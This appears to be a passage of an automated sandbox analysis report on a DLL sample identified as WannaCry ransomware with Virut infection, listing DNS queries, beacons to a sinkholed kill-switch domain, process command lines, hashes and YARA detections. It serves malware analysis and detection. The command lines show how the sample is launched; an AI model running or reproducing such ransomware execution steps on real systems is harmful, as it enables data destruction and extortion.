                                                                                                                                              Jul 23, 2022 01:47:43.928611040 CEST8.8.8.8192.168.2.30x2fb9Name error (3)jwbsjo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:43.964001894 CEST8.8.8.8192.168.2.30xe415Name error (3)uagfvy.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:43.995520115 CEST8.8.8.8192.168.2.30xaccbName error (3)poydst.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:44.023190022 CEST8.8.8.8192.168.2.30xe9b1Name error (3)pangeq.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:47:44.068478107 CEST8.8.8.8192.168.2.30x952fName error (3)atvhio.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:04.174994946 CEST8.8.8.8192.168.2.30x4a10Name error (3)vwfgtb.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.271245003 CEST8.8.8.8192.168.2.30xd3d1Name error (3)fosajt.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.302478075 CEST8.8.8.8192.168.2.30xad7Name error (3)liamse.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.343332052 CEST8.8.8.8192.168.2.30x7bd5Name error (3)boqbzc.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.371479034 CEST8.8.8.8192.168.2.30x3635Name error (3)xyzrpb.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.406917095 CEST8.8.8.8192.168.2.30x424Name error (3)phirwq.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.440026045 CEST8.8.8.8192.168.2.30x699bName error (3)tvmwem.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.469676971 CEST8.8.8.8192.168.2.30x5109Name error (3)wfuinm.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.582082987 CEST8.8.8.8192.168.2.30x6ca5Name error (3)abeaay.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.613313913 CEST8.8.8.8192.168.2.30x29bName error (3)qavmrl.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.641983986 CEST8.8.8.8192.168.2.30xe8c0Name error (3)joddge.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.672591925 CEST8.8.8.8192.168.2.30xe259Name error (3)exiuuy.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.707659960 CEST8.8.8.8192.168.2.30x3503Name error (3)bauied.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.737694025 CEST8.8.8.8192.168.2.30x818eName error (3)dpoead.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.777004004 CEST8.8.8.8192.168.2.30x1da8Name error (3)tpmtiw.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.808573008 CEST8.8.8.8192.168.2.30xcbf5Name error (3)glutbe.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.840200901 CEST8.8.8.8192.168.2.30x2f9dName error (3)hmpjac.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.870671034 CEST8.8.8.8192.168.2.30xf9d9Name error (3)xgxizm.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.919764996 CEST8.8.8.8192.168.2.30xd72bName error (3)trptke.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.947329998 CEST8.8.8.8192.168.2.30xab65Name error (3)tgvyjo.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:24.996172905 CEST8.8.8.8192.168.2.30x413fName error (3)otoagh.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:25.045352936 CEST8.8.8.8192.168.2.30x9c40Name error (3)ihepfj.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                              Jul 23, 2022 01:48:25.155997038 CEST8.8.8.8192.168.2.30x1288Name error (3)quydys.comnonenoneA (IP address)IN (0x0001)
• www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com

Session ID: 0
Source IP: 192.168.2.3
Source Port: 49740
Destination IP: 104.16.173.80
Destination Port: 80
Process: C:\Windows\mssecsvc.exe

Timestamp | kBytes transferred | Direction | Data
Jul 23, 2022 01:44:23.822949886 CEST | 1009 | OUT | GET / HTTP/1.1
Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
Cache-Control: no-cache
Jul 23, 2022 01:44:23.851027012 CEST | 1010 | IN | HTTP/1.1 200 OK
Date: Fri, 22 Jul 2022 23:44:23 GMT
Content-Type: text/html
Content-Length: 607
Connection: close
Server: cloudflare
CF-RAY: 72f00b44eb909134-FRA
Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>


Session ID: 1
Source IP: 192.168.2.3
Source Port: 49772
Destination IP: 104.17.244.81
Destination Port: 80
Process: C:\Windows\mssecsvc.exe

Timestamp | kBytes transferred | Direction | Data
Jul 23, 2022 01:46:05.567797899 CEST | 7271 | OUT | GET / HTTP/1.1
Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
Cache-Control: no-cache
Jul 23, 2022 01:46:05.601896048 CEST | 7272 | IN | HTTP/1.1 200 OK
Date: Fri, 22 Jul 2022 23:46:05 GMT
Content-Type: text/html
Content-Length: 607
Connection: close
Server: cloudflare
CF-RAY: 72f00dc0dd689165-FRA
Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>



Target ID: 0
Start time: 01:44:14
Start date: 23/07/2022
Path: C:\Windows\System32\loaddll32.exe
Wow64 process (32bit): true
Commandline: loaddll32.exe "C:\Users\user\Desktop\y2jb4FtSNq.dll"
Imagebase: 0xf40000
File size: 116736 bytes
MD5 hash: 7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 1
Start time: 01:44:15
Start date: 23/07/2022
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\y2jb4FtSNq.dll",#1
Imagebase: 0xc20000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 2
Start time: 01:44:15
Start date: 23/07/2022
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\y2jb4FtSNq.dll,PlayGame
Imagebase: 0x220000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 3
Start time: 01:44:15
Start date: 23/07/2022
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe "C:\Users\user\Desktop\y2jb4FtSNq.dll",#1
Imagebase: 0x220000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 4
Start time: 01:44:17
Start date: 23/07/2022
Path: C:\Windows\mssecsvc.exe
Wow64 process (32bit): true
Commandline: C:\WINDOWS\mssecsvc.exe
Imagebase: 0x400000
File size: 3751936 bytes
MD5 hash: B0F06045E4D3E693094C54C315A5B632
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000000.263313016.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
• Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000000.264700053.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
• Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000000.260276885.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
• Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000002.499145703.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
• Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000004.00000002.501302167.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security
• Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000004.00000000.263399045.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
• Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000000.261708466.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000004.00000000.261795649.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000004.00000000.260345828.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000004.00000002.499291701.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000004.00000000.264801473.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                                                                                              • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (with the help of binar.ly)
                                                                                                                                              • Rule: WannaCry_Ransomware_Gen, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (based on rule by US CERT)
                                                                                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Windows\mssecsvc.exe, Author: Joe Security
                                                                                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\mssecsvc.exe, Author: us-cert code analysis team
                                                                                                                                              • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\mssecsvc.exe, Author: ReversingLabs
                                                                                                                                              Antivirus matches:
                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                              • Detection: 82%, Metadefender, Browse
                                                                                                                                              • Detection: 97%, ReversingLabs
                                                                                                                                              Reputation:low

                                                                                                                                              Target ID:7
                                                                                                                                              Start time:01:44:19
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:rundll32.exe "C:\Users\user\Desktop\y2jb4FtSNq.dll",PlayGame
                                                                                                                                              Imagebase:0x220000
                                                                                                                                              File size:61952 bytes
                                                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              Target ID:8
                                                                                                                                              Start time:01:44:19
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\mssecsvc.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\WINDOWS\mssecsvc.exe
                                                                                                                                              Imagebase:0x400000
                                                                                                                                              File size:3751936 bytes
                                                                                                                                              MD5 hash:B0F06045E4D3E693094C54C315A5B632
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000008.00000000.265661394.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000008.00000000.265918603.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000008.00000002.348414559.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000008.00000000.272553493.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000008.00000000.269555839.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000008.00000000.272462934.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000008.00000002.348690021.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000008.00000000.268279528.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000008.00000000.268327554.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000008.00000000.269636175.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                                                                                              Reputation:low

                                                                                                                                              Target ID:9
                                                                                                                                              Start time:01:44:20
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\winlogon.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:winlogon.exe
                                                                                                                                              Imagebase:0x7ff75dae0000
                                                                                                                                              File size:677376 bytes
                                                                                                                                              MD5 hash:F9017F2DC455AD373DF036F5817A8870
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000009.00000002.780672620.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000009.00000002.780866805.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000009.00000000.267576574.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000009.00000000.277208197.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000009.00000000.277226697.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              Reputation:moderate

                                                                                                                                              Target ID:11
                                                                                                                                              Start time:01:44:22
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\lsass.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\lsass.exe
                                                                                                                                              Imagebase:0x7ff6988c0000
                                                                                                                                              File size:57976 bytes
                                                                                                                                              MD5 hash:317340CD278A374BCEF6A30194557227
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000B.00000002.780673588.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000B.00000000.280498648.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000B.00000000.280480248.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000B.00000000.270705788.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000B.00000002.780822573.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              Reputation:moderate

                                                                                                                                              Target ID:12
                                                                                                                                              Start time:01:44:24
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\mssecsvc.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\WINDOWS\mssecsvc.exe -m security
                                                                                                                                              Imagebase:0x400000
                                                                                                                                              File size:3751936 bytes
                                                                                                                                              MD5 hash:B0F06045E4D3E693094C54C315A5B632
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000000C.00000002.350893467.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000C.00000002.353602442.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 0000000C.00000000.275826042.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000C.00000002.353517886.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000000C.00000000.275761350.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 0000000C.00000002.351059064.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                                                                                              Reputation:low

                                                                                                                                              Target ID:13
                                                                                                                                              Start time:01:44:24
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\fontdrvhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:fontdrvhost.exe
                                                                                                                                              Imagebase:0x7ff7d9820000
                                                                                                                                              File size:790304 bytes
                                                                                                                                              MD5 hash:31113981180E69C2773BCADA4051738A
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000002.780855018.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000000.276526183.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000002.780673231.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000000.282602589.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000000.282588543.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              Reputation:moderate

                                                                                                                                              Target ID:14
                                                                                                                                              Start time:01:44:25
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000E.00000000.283723923.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000E.00000000.279124721.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000E.00000000.283773556.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000E.00000002.780673489.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000E.00000002.780892179.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                              Target ID:15
                                                                                                                                              Start time:01:44:26
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000F.00000002.780898779.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000F.00000000.286148744.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000F.00000000.286120920.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000F.00000002.780705476.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000F.00000000.280846921.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                              Target ID:16
                                                                                                                                              Start time:01:44:32
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              Target ID:17
                                                                                                                                              Start time:01:44:32
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k rpcss -p
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000011.00000000.293535690.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000011.00000002.780713316.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000011.00000000.299868171.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000011.00000000.299802477.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000011.00000002.780873967.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                              Target ID:18
                                                                                                                                              Start time:01:44:33
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              Target ID:19
                                                                                                                                              Start time:01:44:33
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              Target ID:20
                                                                                                                                              Start time:01:44:34
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              Target ID:21
                                                                                                                                              Start time:01:44:35
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                              Imagebase:0x7ff73c930000
